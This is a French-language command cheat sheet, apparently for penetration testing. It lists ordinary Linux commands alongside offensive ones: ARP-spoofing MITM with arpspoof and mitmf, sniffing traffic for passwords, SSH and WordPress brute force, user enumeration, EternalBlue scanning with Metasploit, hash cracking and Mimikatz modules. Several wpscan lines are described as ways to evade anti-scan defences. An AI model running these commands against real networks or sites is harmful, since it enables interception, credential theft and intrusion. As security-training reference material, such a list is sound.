Tester le certificat TLS sur les sites "ssllabs.com" et "hardenize.com" | Tester le certificat TLS en ligne | openssl | Certificats TLS - SSL |
top | Afficher les processus en temps réel | kill | Gestion des processus |
touch file1.txt | Créer un fichier1.txt avec touch | touch | gestion dossiers et fichiers |
ts | manipulation des sessions Terminal Server (autorise le dépassement du nombre maximal de connexions simultanées notamment). | Mimikatz | Exploitation vulnérabilités |
uname -a | Afficher le système et le noyau | Linux standard | Linux OS |
uptime | Afficher la disponibilité | Linux standard | Linux OS |
watch -n 5 'ntpq -p' | Émettez la commande 'ntpq -p' toutes les 5 secondes et affichez la sortie | watch | Voir exécuter une cmd tout les 5s |
whereis command | Trouver binaire / source / manuel pour la "commande" | whereis | gestion dossiers et fichiers |
whoami | Montrez votre nom d'utilisateur | Linux standard | Linux OS |
winmine | module de démonstration permettant de manipuler le démineur de Windows XP et 7. | Mimikatz | Exploitation vulnérabilités |
xsltproc nmap.xml -o nmap.html | Convertir les fichiers xml nmap en fichiers html | nmap | Commande spéciale |
arpspoof -i wlan0 192.168.1.20 192.168.1.1 | arpspoof -i interface ip_cible ip_du_routeur | arpspoof - suite dsniff | MITM - Man In The Middle |
mitmf --arp --spoof --gateway 192.168.1.1 --target 192.168.1.20 -i wlan0 | Empoisonnement de la table ARP de l'hote 192.168.1.20 via l'interface wlan0 | mitmf | MITM - Man In The Middle |
mitmf --arp --spoof --gateway 192.168.1.1 -i wlan0 | Empoisonnement de la table ARP de tous les hosts du LAN via l'interface wlan0 | mitmf | MITM - Man In The Middle |
arp -a | Afficher ma table ARP | arpspoof - suite dsniff | MITM - Man In The Middle |
ip neigh | Afficher mon cache ARP | ip neigh | MITM - Man In The Middle |
ip neigh flush all | Supprimer mon cache ARP | ip neigh | MITM - Man In The Middle |
ssh root@192.168.1.20 tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i - | Analyser le trafic à distance via SSH avec Wireshark (spécifiez "l'option -U" pour empêcher la mise en mémoire tampon et "-i any" pour voir toutes les interfaces | ssh + tcpdump + wireshark | Capture de paquets à distance |
ngrep -i password | Rechercher le mot "password" dans le trafic réseau: | ngrep | Analyse de paquets |
urlsnarf | Afficher les requêtes HTTP GET | urlsnarf | Analyse de paquets |
driftnet | Afficher les images transmises | driftnet | Analyse de paquets |
nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24 | Scan TCP (scan SYN = scan semi-ouvert) | nmap | Scanner de reseaux |
nmap -n -sn -PR 10.5.23.0/24 | Scan hote ARP | nmap | Scanner de reseaux |
ls /usr/share/nmap/scripts | Liste des scripts Nmap | nmap | Scripts NSE |
nmap -n -Pn -p 443 --script smbvuln- ms17-010 10.5.23.0/24 | Rechercher les hôtes vulnérables EternalBlue | nmap | Scripts NSE |
shodan.io, censys.io | Bases de données publiques de scan Internet | shodan | Scanner de reseaux |
ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24 | Essayez les mots de passe SSH à partir d'une liste de mots | ncrack | Déchiffrement de mots de passe |
searchsploit apache | Recherche des exploits pour "apache" (copie locale de l'Exploit-DB) | searchsploit | Recherche des exploits |
john hashes.txt | Déchiffrement d'un hash en utilisant John the Ripper | John the Ripper | Déchiffrement de hash |
hashid 869d[...]bd88 | Identifier le type de hachage | hashid | Déchiffrement de hash |
hashcat --example-hashes | Afficher des exemples de types de hachage pour hashcat | hashcat | Déchiffrement de hash |
hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/* | Déchiffrement hashes par code-type (par exemple code 5600 pour le type NetNTLMv2) | hashcat | Déchiffrement de hash |
msfconsole | Démarrez Metasploit | métasploit - msfconsole | Exploitation vulnérabilités |
> search eternalblue | Recherche exploit | métasploit - msfconsole | Exploitation vulnérabilités |
msf > use exploit/windows/smb/ms17_… | Utilisez exploit | métasploit - msfconsole | Exploitation vulnérabilités |
curl ifconfig.me | Afficher son ip publique | curl | Linux OS |
ngrep 'secret' port 389
| Rechercher le mot "secret" sur le trafic réseau, sur le port 389 (ldap) plus exactement | ngrep | Analyse de paquets |
systemctl [start|restart|stop|status|enable|disable] ssh
| Méthode "Systemd" - Démarrer/arrêter/statuts SSH | ssh | Serveur/Client SSH |
service ssh [start|restart|stop|status]
| Méthode "service command" - Démarrer/arrêter/statuts SSH | ssh | Serveur/Client SSH |
/etc/init.d/ssh [start|restart|stop|status]
| Méthode "System V. Init scripts" - Démarrer/arrêter/statuts SSH | ssh | Serveur/Client SSH |
wpscan --url https://oksecu.com --passwords test-mdp.txt --url test-users.txt | | wpscan | scanner de vulnérabilités WordPress |
wpscan --url https://oksecu.com -P soleil123 t -U admin | | wpscan | scanner de vulnérabilités WordPress |
whatweb monsite.com | https://github.com/urbanadventurer/WhatWeb | whatweb | scan la structure d'un site web |
netstat -lnp | grep LISTEN | Lister vos connexions entrantes/sortantes | netstat + grep | lister les connexions en ECOUTE |
theharvester -d example.com -l 500 -b all -e admin@example.com | Collecte informations | theharvester | Rechercher des comptes de réseaux sociaux associés à une adresse e-mail |
wpscan --url http://example.com | Scanne le site WordPress spécifié par l'URL pour détecter des vulnérabilités générales.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate u | Énumère les utilisateurs du site WordPress. Utile pour identifier les noms d'utilisateur, souvent utilisé pour des attaques de force brute.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate p | Énumère les plugins installés sur le site. Cette commande permet d'identifier les plugins potentiellement vulnérables. | wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate t | Énumère les thèmes installés sur le site WordPress pour rechercher d'éventuelles vulnérabilités.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate vp | Énumère les plugins vulnérables uniquement, en s'appuyant sur la base de données de vulnérabilités de WPScan.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --api-token YOUR_TOKEN | Utilise un jeton API WPScan pour accéder à la base de données en ligne des vulnérabilités WordPress. Requis pour certaines fonctions avancées. | wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --force | Force le scan même si le site est protégé ou si certains problèmes de certificat SSL sont détectés. | wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --passwords /path/to/passwords.txt | Effectue une attaque par force brute en testant plusieurs mots de passe sur les comptes utilisateurs énumérés précédemment. | wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --stealthy | Effectue un scan furtif en minimisant les requêtes, évitant ainsi de déclencher des protections anti-scan sur le site cible. | wpscan | scanner de vulnérabilités WordPress |
wpscan --update | Met à jour WPScan et sa base de données de vulnérabilités pour garantir l'utilisation des informations les plus récentes lors des scans. | wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate ap | Énumère uniquement les plugins avec des versions vulnérables.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --help | Affiche l'aide complète de WPScan avec toutes les options disponibles et leurs descriptions.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --random-user-agent | Utilise un User-Agent aléatoire pour chaque requête HTTP afin de tromper les protections qui se basent sur l'empreinte du User-Agent.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --throttle 5 | Définit un délai de 5 secondes entre chaque requête pour éviter d'être détecté ou bloqué par des systèmes de défense anti-brute-force.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --proxy http://proxy.example.com:8080 | Utilise un serveur proxy pour masquer l'adresse IP de l'utilisateur lors de l'exécution du scan.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --ignore-main-redirect | Ignore les redirections principales du site, souvent utilisées pour des raisons de sécurité ou des configurations spécifiques.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --no-banner | Supprime l'affichage de la bannière WPScan lors de l'exécution, utile pour des scripts automatisés ou des rapports propres.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --output /path/to/output.txt | Enregistre les résultats du scan dans un fichier texte pour consultation ultérieure ou pour générer des rapports.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --format json --output report.json | Génère un rapport de scan au format JSON, pratique pour l'intégration avec d'autres outils ou l'analyse des résultats dans des systèmes automatisés. | wpscan | scanner de vulnérabilités WordPress |
wpscan --disable-tls-checks | Désactive les vérifications des certificats TLS, utile si le site a un certificat auto-signé ou expiré.
| wpscan | scanner de vulnérabilités WordPress |
wpscan --url http://example.com --enumerate vt | Énumère les thèmes vulnérables uniquement, en s'appuyant sur la base de données WPScan. | wpscan | scanner de vulnérabilités WordPress |
wpscan --proxy-auth user:password | Ajoute une authentification proxy si le proxy utilisé pour le scan nécessite un identifiant et un mot de passe. | wpscan | scanner de vulnérabilités WordPress |